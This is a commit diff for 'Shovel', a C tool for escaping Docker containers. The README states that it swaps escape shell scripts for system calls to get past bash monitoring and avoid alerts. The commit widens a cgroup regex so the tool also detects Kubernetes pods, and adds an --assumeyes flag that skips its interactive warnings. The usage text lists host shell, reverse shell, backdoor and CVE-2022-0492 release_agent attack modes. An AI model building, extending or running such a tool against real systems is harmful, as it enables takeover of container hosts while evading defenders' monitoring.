fix identifying k8s environment error and add assumeyes option to ski…

…p interaction
SPuerBRead · Aug 3, 2022 · ddfbee1 · ddfbee1
1 parent bd9d8e8
commit ddfbee1
Show file tree

Hide file tree

Showing 5 changed files with 35 additions and 20 deletions.
diff --git a/README.md b/README.md
@@ -2,7 +2,15 @@
 
 Docker容器逃逸工具
 
-原理上就是逃逸的那一堆shell脚本，换成系统调用，绕过bash的监控
+1、通过mount命令逃逸触发告警？
+
+2、unshare命令发现没有-C参数？
+
+3、机器上没有各种语言的执行环境？
+
+4、逃逸程序太大不好下载？
+
+遇到以上问题那就用下这个程序吧，原理上就是逃逸的那一堆shell脚本，换成系统调用，绕过bash的监控
 
 ![](./img/shovel.gif)
 
@@ -52,7 +60,7 @@ Options of other
     -I, --ip                             set ip address in reverse mode
     -P, --port                           set port in reverse mode
     -B, --backdoor_path                  set backdoor file path
-
+    -y, --assumeyes                      automatically answer yes for all questions
 Mode (-m) type guide
     exec:     run a single command and return the result
     shell:    get host shell in current console

diff --git a/docker/cgroup.c b/docker/cgroup.c
@@ -11,10 +11,10 @@
 
 int get_cgroup_id(char *cgroup_id) {
     char *cgroup_path = "/proc/1/cgroup";
-    char *cgroup_data = (char *) malloc(1024 * 10 * sizeof(char));
-    memset(cgroup_data, 0x00, 1024 * 10);
+    char *cgroup_data = (char *) malloc(1024 * 100 * sizeof(char));
+    memset(cgroup_data, 0x00, 1024 * 100);
     read_file(cgroup_path, cgroup_data, O_RDONLY);
     regex_util(cgroup_data,
-               "\\d+?:[a-zA-Z0-9]*?:(/docker/[a-zA-Z0-9]{64})|(/kubepods\\.slice/kubepods-burstable\\.slice/kubepods-burstable-pod[a-zA-Z0-9_]*?\\.slice/docker-[a-zA-Z0-9]{64}\\.scope)",
+               "\\d+?:[a-zA-Z0-9]*?:(/docker/[a-zA-Z0-9]{64}|/kubepods\\.slice/kubepods-burstable\\.slice/kubepods-burstable-pod[a-zA-Z0-9-]+?\\.slice/docker-[a-zA-Z0-9]{64}\\.scope|/kubepods/burstable/pod[a-zA-Z0-9-]+?/[a-zA-Z0-9]{64})",
                cgroup_id);
 }
diff --git a/main.c b/main.c
@@ -55,9 +55,11 @@ int main(int argc, char *argv[]) {
             {"command",        required_argument, NULL, 'c'},
             {"ip",             required_argument, NULL, 'I'},
             {"port",           required_argument, NULL, 'P'},
-            {"backdoor_path",  required_argument, NULL, 'B'}
+            {"backdoor_path",  required_argument, NULL, 'B'},
+            {"assumeyes",      no_argument,       NULL, 'y'}
     };
     int opt;
+    int assumeyes = 0;
     attack_info.attack_mode = -1;
     attack_info.attack_type = -1;
     attack_info.command = (char *) malloc(512 * sizeof(char));
@@ -68,7 +70,7 @@ int main(int argc, char *argv[]) {
     memset(attack_info.ip, 0x00, 64);
     memset(attack_info.ip, 0x00, 512);
     memset(attack_info.port, 0x00, 10);
-    const char *opt_type = "hvrdup:m:c:I:P:B:";
+    const char *opt_type = "hvrduyp:m:c:I:P:B:";
     while ((opt = getopt_long_only(argc, argv, opt_type, opts, NULL)) != -1) {
         switch (opt) {
             case 'h':
@@ -113,22 +115,27 @@ int main(int argc, char *argv[]) {
                 attack_info.attack_type = CVE_2022_0492;
                 attack_info.attack_mode = SHELL;
                 break;
+            case 'y':
+                assumeyes = 1;
+                break;
             default:
                 usage(argv[0]);
                 break;
         }
     }
-    if (attack_info.attack_type == RELEASE_AGENT) {
-        if (attack_info.attack_mode == EXEC) {
-            output_bash_warning("release_agent", "exec");
-        } else if (attack_info.attack_mode == SHELL) {
-            output_bash_warning("release_agent", "shell");
-        } else if (attack_info.attack_mode == REVERSE) {
-            output_bash_warning("release_agent", "reverse");
-        }
-    } else if (attack_info.attack_type == DEVICE_ALLOW) {
-        if (attack_info.attack_mode == REVERSE) {
-            output_bash_warning("device_allow", "reverse");
+    if (assumeyes != 1) {
+        if (attack_info.attack_type == RELEASE_AGENT) {
+            if (attack_info.attack_mode == EXEC) {
+                output_bash_warning("release_agent", "exec");
+            } else if (attack_info.attack_mode == SHELL) {
+                output_bash_warning("release_agent", "shell");
+            } else if (attack_info.attack_mode == REVERSE) {
+                output_bash_warning("release_agent", "reverse");
+            }
+        } else if (attack_info.attack_type == DEVICE_ALLOW) {
+            if (attack_info.attack_mode == REVERSE) {
+                output_bash_warning("device_allow", "reverse");
+            }
         }
     }
     if (attack_info.attack_type == -1 || attack_info.attack_mode == -1) {

diff --git a/util/program_info.c b/util/program_info.c
@@ -8,7 +8,7 @@
 #include <stdlib.h>
 
 #define PROGRAM_NAME "Shovel"
-#define VERSION "1.0"
+#define VERSION "1.1"
 
 
 void usage(char *args0) {
@@ -29,6 +29,7 @@ void usage(char *args0) {
            "    -I, --ip                             set ip address in reverse mode\n"
            "    -P, --port                           set port in reverse mode\n"
            "    -B, --backdoor_path                  set backdoor file path\n"
+           "    -y, --assumeyes                      automatically answer yes for all questions"
            "\n"
            "Mode (-m) type guide\n"
            "    exec:     run a single command and return the result\n"

diff --git a/util/regex_util.c b/util/regex_util.c
@@ -22,7 +22,6 @@ void regex_util(char *src, char *reg, char *result) {
             strcpy(cursorCopy, src);
             cursorCopy[match_char[1].rm_eo] = 0;
             strcpy(result, cursorCopy + match_char[1].rm_so);
-
         }
     } else if (match_result == REG_NOMATCH) {
     } else {